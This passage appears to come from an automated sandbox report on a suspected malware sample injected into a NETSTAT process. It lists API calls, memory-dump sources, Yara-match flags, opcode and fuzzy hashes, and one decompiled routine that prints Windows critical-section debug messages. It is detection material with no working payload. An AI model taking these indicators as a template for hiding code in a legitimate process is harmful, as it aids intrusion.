                                          • Opcode Fuzzy Hash: 6c37b4ee0db3cad1e0504e0529d0d02f5f61a9f0c43e8050fefe1f91f0640f86
                                          • Instruction Fuzzy Hash: 75011EB5E4020EABDB10EBA4DC42FEEB7B8DB54708F0445E5E90997241F631EB548B92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00BD6A16,?,00BD71BD,00BD71BD,?,00BD6A16,?,?,?,?,?,00000000,00000005,00000206), ref: 00BDCA6D
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 757039e2b31712dea58105c8837dab04ab6a20ba5375103a478282a305920402
                                          • Instruction ID: 243629c867c49c8f3283465774f246ddce14dfa0af4116225f189c647daec4ab
                                          • Opcode Fuzzy Hash: 757039e2b31712dea58105c8837dab04ab6a20ba5375103a478282a305920402
                                          • Instruction Fuzzy Hash: 85F068B52002046FDB14DF94DC85DEB77A9EF84350F10869AFD5957741E630ED11CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,E80B3131,00000000,00000000,?,?,?,E80B3131,?), ref: 00BDB5BC
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: eee904ed97176660016744ef57a1f7af0b4c31c8af90f5706c5d201cdca9aa5a
                                          • Instruction ID: 68754e9cd4653c8bde317bca7a77d225ebbb26390a8b0a6ef1195ea4c6a4edfa
                                          • Opcode Fuzzy Hash: eee904ed97176660016744ef57a1f7af0b4c31c8af90f5706c5d201cdca9aa5a
                                          • Instruction Fuzzy Hash: 8EE0653338120436E320619D9C03FDBB3CCDB81B21F150066FA0DEA2C1E991F90102A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,00BCDC62,00BCDC62,?,00000000,?,?), ref: 00BDCC10
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 81c31ca114a574e5342175063c30442c26e61751ee60c9a8b8ab415d54d3fe98
                                          • Instruction ID: ef752170e052ddcf9b25f8aa534e50486035e26ee30711a31bf19c5f936c114c
                                          • Opcode Fuzzy Hash: 81c31ca114a574e5342175063c30442c26e61751ee60c9a8b8ab415d54d3fe98
                                          • Instruction Fuzzy Hash: E2E06DB1340204AFD720DF59CC85EEB77A9AF88364F1585ADFD49A7241D630E901CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00BD3D22,?,?,00BD3D22,00000000,?), ref: 00BCE32A
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: e78146e52c0a2be0d067f0a189e35af7ef539330da83deb21ca263a2f310c3c8
                                          • Instruction ID: 0922d9b3a00189c1e1e6dd9d84623ab9dae551d9c05bd8ac60640dbf59007fe2
                                          • Opcode Fuzzy Hash: e78146e52c0a2be0d067f0a189e35af7ef539330da83deb21ca263a2f310c3c8
                                          • Instruction Fuzzy Hash: 9BE0867128020867FB24A6A89C46F6A3398CBC8724F5846D4F92CDB3C2E674F9434168
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetFileAttributesW.KERNELBASE(00BD3D22,?,?,00BD3D22,00000000,?), ref: 00BCE32A
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: e8ee7c209d29303dc0a5569b4d8b4577a41670ec2e589ad5bf5705c0dab89709
                                          • Instruction ID: bee4088ea2ea43938dccc11022da0e7ad539ad9ee376ce181184baf43e68cd3d
                                          • Opcode Fuzzy Hash: e8ee7c209d29303dc0a5569b4d8b4577a41670ec2e589ad5bf5705c0dab89709
                                          • Instruction Fuzzy Hash: F5E0867118030467F72466688C46FA933988BCC724F544694F9689B3D2E674F9434268
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 00BDCAAD
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                          • Instruction ID: e1208a3c9d246f314033e115a11c6f3080bd19faefb09fff27b5c4b5a6531eef
                                          • Opcode Fuzzy Hash: 7383604f3fe5c795b9236c36b71377a732ea8f0b598dae172b24566b996ec6fa
                                          • Instruction Fuzzy Hash: 8AE01AB12002046BD714DF49DC49E9777ACAF88750F014155B90957241D530E914CAB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00BD6A16,?,00BD71BD,00BD71BD,?,00BD6A16,?,?,?,?,?,00000000,00000005,00000206), ref: 00BDCA6D
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                          • Instruction ID: c41f649d48ba77b760341ac8457f1ae6234b14e534c88d11d18304e992c63956
                                          • Opcode Fuzzy Hash: 71d30878ffc0fd6371cee718eb9878eb3463dfa7e001799ef66c66478ee65a27
                                          • Instruction Fuzzy Hash: 8AE04FB12002046BD714DF59DC45E9777ACEF88750F014155FE095B341C530F910CAF1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,00BCDC62,00BCDC62,?,00000000,?,?), ref: 00BDCC10
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                          • Instruction ID: 7dbc5327f853a82c8332974a1cfc4248b28fe96fb7a392a392e4466cd805623a
                                          • Opcode Fuzzy Hash: 6915fa93d7270e13bfd703e99c47af289f1ee2615e020f739a89d4d612532f61
                                          • Instruction Fuzzy Hash: C5E01AB12402086BD710DF49CC85EE777ADAF88660F118159BA0957241D630E8108AB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 00BDCAAD
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: ea130578f0c8bb043f8c8b45987bd307f222320f3a56207a9e4d2d91bf9ef149
                                          • Instruction ID: 47d8f3f8123f0b66b7e24f66bfdcdf68ed05aa225b306ef1412dc4383a5b2cda
                                          • Opcode Fuzzy Hash: ea130578f0c8bb043f8c8b45987bd307f222320f3a56207a9e4d2d91bf9ef149
                                          • Instruction Fuzzy Hash: 11E0DFA81082864BDB05EFB9A9D08AB7B94EF423243044A8AE8D547307D130C85ACBB2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,00BC88CA,?), ref: 00BCE13B
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 6f0d9ecaa9a0248e48b1feabb74878be41247f4ca94b5cff0d1fc0f869a54a91
                                          • Instruction ID: 5f1e72acd7dd2fc080cc36ba1f683d273baa0353278766549ad1027ee95cc8dc
                                          • Opcode Fuzzy Hash: 6f0d9ecaa9a0248e48b1feabb74878be41247f4ca94b5cff0d1fc0f869a54a91
                                          • Instruction Fuzzy Hash: 60E0C271240304A7EA109BE48C03F9572D49F45758F0900A4FD48EB3C3EA60E1114110
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,00BC88CA,?), ref: 00BCE13B
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: 985de137ac41ba15653d57465674028cf9154bf9b7056d838890ae7c9d812485
                                          • Instruction ID: 2bd8c5b393efd163aef0acfd1de29e7b08c0764d2886fd8e7745d428d5574dc5
                                          • Opcode Fuzzy Hash: 985de137ac41ba15653d57465674028cf9154bf9b7056d838890ae7c9d812485
                                          • Instruction Fuzzy Hash: 93D0A77169030877F710E6E48C03F5672CC9B48B50F0900A4FA09E73C3E960F5014164
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 691a3f85471adbe1417d4385b8423cae2914d2668ca100b2c3e8ff189aca502c
                                          • Instruction ID: 9a47b0cf293577a88343b7eadb82bc3ec82924d8b8d9da5ba4cee2983a606bf9
                                          • Opcode Fuzzy Hash: 691a3f85471adbe1417d4385b8423cae2914d2668ca100b2c3e8ff189aca502c
                                          • Instruction Fuzzy Hash: 5EB09B71A414D5C9D615D7745608727795477D0741F16C051D1060646A4778C491F6F6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.497017430.0000000000BC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00BC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_bc0000_NETSTAT.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f3555672affcda21dc05cbca942d29a95e1b9a308f7b8b8df946ef1f875bbfc2
                                          • Instruction ID: ad545bb3961d2a3d27d07a93f8d10f9f2389c82550553f46fb68b8dc568dca21
                                          • Opcode Fuzzy Hash: f3555672affcda21dc05cbca942d29a95e1b9a308f7b8b8df946ef1f875bbfc2
                                          • Instruction Fuzzy Hash: A8D0C235A4614D8ECB114E0C78825A4F760AF0B104F0452C6DE489F213CA018414C2CA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E0362FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                          				void* _t7;
                                          				intOrPtr _t9;
                                          				intOrPtr _t10;
                                          				intOrPtr* _t12;
                                          				intOrPtr* _t13;
                                          				intOrPtr _t14;
                                          				intOrPtr* _t15;
                                          
                                          				_t13 = __edx;
                                          				_push(_a4);
                                          				_t14 =  *[fs:0x18];
                                          				_t15 = _t12;
                                          				_t7 = E035DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                          				_push(_t13);
                                          				E03625720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                          				_t9 =  *_t15;
                                          				if(_t9 == 0xffffffff) {
                                          					_t10 = 0;
                                          				} else {
                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                          				}
                                          				_push(_t10);
                                          				_push(_t15);
                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                          				return E03625720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                          			}











                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0362FDFA
                                          Strings
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0362FE2B
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0362FE01
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.499590658.0000000003570000.00000040.00000800.00020000.00000000.sdmp, Offset: 03570000, based on PE: true
                                          • Associated: 0000000A.00000002.500819063.000000000368B000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 0000000A.00000002.500840419.000000000368F000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_3570000_NETSTAT.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                          • API String ID: 885266447-3903918235
                                          • Opcode ID: 3f3b653934eca753e21f649ec2946c7d4c2b0abba1fd87fc4594ceac0a099282
                                          • Instruction ID: 07ff87225bdcaf06de9c9fc55307d6254edcdcdae4d29e9b369cbebc59ca12a9
                                          • Opcode Fuzzy Hash: 3f3b653934eca753e21f649ec2946c7d4c2b0abba1fd87fc4594ceac0a099282
                                          • Instruction Fuzzy Hash: 5FF04636240A01BFD631AB45DC06F33BF6AEB40730F150314F6285A5E1DA62FC208AF4
                                          Uniqueness

                                          Uniqueness Score: -1.00%